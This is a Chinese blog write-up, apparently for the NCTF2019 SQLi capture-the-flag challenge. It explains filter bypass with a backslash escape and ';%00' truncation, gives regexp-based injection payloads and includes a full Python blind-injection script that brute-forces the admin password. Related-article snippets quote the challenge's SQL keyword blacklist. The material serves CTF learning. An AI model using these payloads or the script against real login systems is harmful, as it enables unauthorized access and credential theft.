[NCTF2019]SQLi

最新推荐文章于 2024-03-24 07:00:00 发布
最新推荐文章于 2024-03-24 07:00:00 发布
阅读量1.2k 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/108983645
版权

在这里插入图片描述
下面回显了sql语句,根据sql语句闭合
直接注

在这里插入图片描述
有过滤,fuzz一波
过滤了蛮多东西的,‘被过滤了,常用注释被过滤,可以用;%00来代替
201得都被过滤了,找找没过滤的
在这里插入图片描述
发现
转义符没过滤,可以利用\转义分号从而构成这种闭合语句
select * from users where username=’’ and passwd=’;%00’

接着再看看有哪些能用的函数
在这里插入图片描述
大部分函数都被禁 了,看到regexp没被过滤,那就可以利用正则,和BJD那次一样
在这里插入图片描述
mysql正则注入
我直接用BJD上次的脚本具体参考
BJDWEB
直接异或,他没有过滤异或符号,其次0x被他过滤了
根据过滤语句,构造闭合语句

passwd=||/**/1;%00&username=\

在这里插入图片描述

可以发现跳转到welcome.php了
然后构造注入语句

passwd=||/**/username/**/regexp/**/"^a";%00&username=\

直接盲注
注意再写python的时候传入%00不能直接传入,直接传会解码直接为空

用户名为:admin

import requests
import time
from urllib import parse

s = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%&(),-./:;<=>@[\]_`{|}~'

flag=''
for i in range(1,100):
    for j in s:
        url='http://2a76f9bd-c19c-4d74-9385-12c43d39a140.node3.buuoj.cn/index.php'
        header={
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
            'Origin': 'http://2a76f9bd-c19c-4d74-9385-12c43d39a140.node3.buuoj.cn',
            'Referer': 'http://2a76f9bd-c19c-4d74-9385-12c43d39a140.node3.buuoj.cn/index.php'
        }
        print(flag+j)
        data = {'passwd':"||/**/passwd/**/regexp/**/\"^{}\";{}".format(flag+j,parse.unquote('%00')),"username":"\\"}

        # data = {'passwd': "||/**/username/**/regexp/**/\"^{}\";{}".format(flag + j, parse.unquote('%00')),"username": "\\"}
        print(data)
        r = requests.post(url=url, data=data,headers=header)
        if "welcome.php" in r.text:
            flag +=j
            print(flag)
            break
        test = flag

print(flag)

拿去登陆的时候还过滤了admin
emm,可以用上面的转义,输上密码即可管理员登陆

penson by 小乌
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛历年题——从第一届到第十四届
[NCTF2019]SQLi——%00截断的“呼唤”
Mrs_H的博客
11-01 733
前言 本来是想趁这个时间点把逆向的作业做一做的,哪想到我装有工具的虚拟机突然暴毙了。抱着个电脑没什么可以做的,没事闲的又做了道sql的题目,也算是弥补了昨天没做题目的遗憾。 正文 关于%00的截断原理是这样的: 0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。 但是这道题我们不是通过%00后面的内容去绕过文件格式的过滤,我们是要通过%00帮我们把最后的引号给屏蔽掉,这是我们的最终目的。 先来看题。 题目的作者让我们去构建
buu-[NCTF2019]SQLi
qaq517384的博客
10-14 183
打开界面是一个有sql语句的登录框 老本行robots.txt发现有提示 $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['
[NCTF2019]SQLi ---不会编程的崽
最新发布
不会编程的崽的博客
03-24 726
过滤有点多哦,而且我还没放完。单引号被过滤了,一刀砍在大动脉。但是路堵了,不代表窗户也封了。思路的确是这个思路,不过常规盲注与常规注入关键字被过滤差不多,看了大佬wp,说重点在regexp上。因为是正则匹配,所以在脚本中,一定要过滤掉通配符("*","+","?而且这个passwd列名,是猜的。很直接哦,给出了sql查询语句。简单扫描一下,robots.txt还能访问。过滤了一些东西,而且只要密码对了就能拿到flag。含义:匹配当前表下,passwd列里的内容是否为YO或者yo。自己写的脚本有点烂,见谅。
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1250
BUUCTF记录贴
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
RSA加密软件 (VC++,MFC程序实现)
05-27
RSA加密程序实现VC++ ,MFC 可以产生任意位数的大数素,可以作为毕业论文哈。也是学习RSA加密的好例子,可以学到很多的加密函数和加密算法,很多算法是很经典的 ,比如欧拉定理,费马定理,还有中国剩余定理等.........
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
论文研究 - 健康志愿者皮肤修复的美速疗法配方的临床评估
06-01
我们的主要目标是评估在皮内显微注射NCTF135HA:registered:后面部,颈部和领口皮肤质量的改善情况。 该混合物由FILORGA Laboratories制造,包含非交联的透明质酸,维生素,抗氧化剂,矿物质盐和酶。 观察到鱼尾纹...
5-1sqli基本概念和原理讲解
山兔的博客
04-29 2071
Sql-Inject漏洞解析-课程目录  SQL Inject 漏洞原理概述  如何判断注入点类型及常见注入类型讲解  注入方式get&post的区别  SQL Inject漏洞手工测试:基于union联合查询的信息获取(select)  SQL Inject漏洞手工测试:基于报错的信息获取(select/delete/update/insert)  SQL Inject漏洞手工测试:操作系统权限获取  SQL注入漏洞-盲注(boolian base)原理及测试  SQL注入漏洞-盲

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值